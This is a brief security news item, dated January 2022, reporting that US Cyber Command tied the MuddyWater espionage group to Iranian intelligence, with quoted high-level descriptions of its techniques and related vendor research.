Security News > 2022 > January > US Cyber Command Links 'MuddyWater' Hacking Group to Iranian Intelligence

US Cyber Command Links 'MuddyWater' Hacking Group to Iranian Intelligence
2022-01-13 00:16

The U.S. Cyber Command on Wednesday officially confirmed MuddyWater's ties to the Iranian intelligence apparatus, while simultaneously detailing the various tools and tactics adopted by the espionage actor to burrow into victim networks.

"MuddyWater has been seen using a variety of techniques to maintain access to victim networks," USCYBERCOM's Cyber National Mission Force said in a statement.

"These include side-loading DLLs in order to trick legitimate programs into running malware and obfuscating PowerShell scripts to hide command and control functions."

Last month, Symantec's Threat Hunter Team publicized findings about a new wave of hacking activities unleashed by the Muddywater group against a string of telecom operators and IT companies throughout the Middle East and Asia during the previous six months using a blend of legitimate tools, publicly available malware, and living-off-the-land methods.

"Analysis of MuddyWater activity suggests the group continues to evolve and adapt their techniques," SentinelOne researcher Amitai Ben Shushan Ehrlich said.

"While still relying on publicly available offensive security tools, the group has been refining its custom toolset and utilizing new techniques to avoid detection."


News URL

https://thehackernews.com/2022/01/us-cyber-command-links-muddywater.html